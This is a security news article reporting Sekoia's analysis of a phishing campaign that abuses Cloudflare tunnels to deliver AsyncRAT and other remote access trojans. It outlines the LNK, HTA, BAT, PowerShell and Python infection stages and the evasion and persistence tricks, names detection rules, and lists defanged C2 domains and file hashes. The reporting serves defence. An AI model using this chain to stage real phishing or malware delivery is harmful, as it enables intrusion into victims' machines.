Hackers Exploit Cloudflare Tunnel Infrastructure to Deploy Multiple Remote Access Trojans

The Sekoia TDR (Threat Detection & Research) team has reported on a sophisticated network infrastructure named “Cloudflare tunnel infrastructure to deliver multiple RATs” being exploited by cyber attackers since at least February 2024.

This infrastructure has been utilized to host malicious files and distribute remote access trojans (RATs), including the notorious AsyncRAT.

Complex Infection Chains and Persistent Tactics

The infection chain begins with a phishing email, which often masquerades as legitimate business correspondence like invoices or orders, to deceive recipients into opening an attachment.

The attachment in question is typically an old “application/windows-library+xml” file type.

Although this file type can be blocked at email gateways, it’s not always flagged since it might be considered less threatening than binary files.

Upon opening, this file triggers a connection to a WebDAV resource hosted within the Cloudflare infrastructure, setting off a multi-step execution process.

Initial Access and Execution: The phishing email’s attachment leads users to a deceptive LNK file, which, instead of opening the promised PDF, executes an HTML Application (HTA) file. This HTA file uses VBScript to launch a batch file (BAT), setting up Python on the victim’s machine. This complex script uses PowerShell to download and install necessary dependencies, including Python, which then aids in obfuscating further stages of the attack.

Defense Evasion and Persistence: To evade detection, attackers employ techniques like modifying file attributes to hide installation folders and using scripts to clean up traces after the initial setup. Persistence is achieved by placing malicious scripts in the Windows Startup folder, ensuring that the malware persists across system reboots.

Detection and Monitoring

Sekoia’s detection strategy includes a combination of Sigma rules and custom queries in their Sekoia Operative Language (SOL).

These rules are designed to catch the various stages of the attack at multiple points, from phishing email attachments to PowerShell commands used for reflective loading of payloads.

For instance, rules like “Suspicious Email Attachment Received” help filter out potentially harmful attachments, while “Mshta Suspicious Child Process” and “Dynamic DNS Contacted” pinpoint execution and command-and-control (C2) activities.

This report underscores the challenges faced by security professionals in detecting and thwarting such advanced and evolving threats.

The attackers’ use of legitimate-looking infrastructure and sophisticated evasion techniques highlights the ongoing cat-and-mouse game in cybersecurity.

Sekoia TDR remains committed to monitoring this and similar threats, refining detection methods to keep ahead of attackers’ tactics.

The use of Cloudflare’s infrastructure for these malicious purposes demonstrates the ingenuity of modern cybercriminals and the necessity for continuous adaptation in defense mechanisms.

The research also emphasizes the importance of integrating threat intelligence feeds with real-time detection capabilities to dismantle these sophisticated attack vectors effectively.

This detailed analysis not only sheds light on the methods employed by attackers but also serves as a blueprint for organizations to enhance their security measures against such insidious threats.

Indicators of Compromise (IoCs):

Type	Indicator
Command and Control	malawi-light-pill-bolt[.]trycloudflare[.]com
	players-time-corresponding-th[.]trycloudflare[.]com
	spaces-corner-notices-battery[.]trycloudflare[.]com
	xi-if-grows-valued[.]trycloudflare[.]com
	phvnmarch8787[.]duckdns[.]org
Files	0d8d46ec44e737e6ef6cd7df8edf95d83807e84be825ef76089307b399a6bcbb (mslibrary attachment)
	c935cc41342794c23d640333a1ddd511f9c51e5b790261dc848ec5f7ac28650a (ben.bat)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!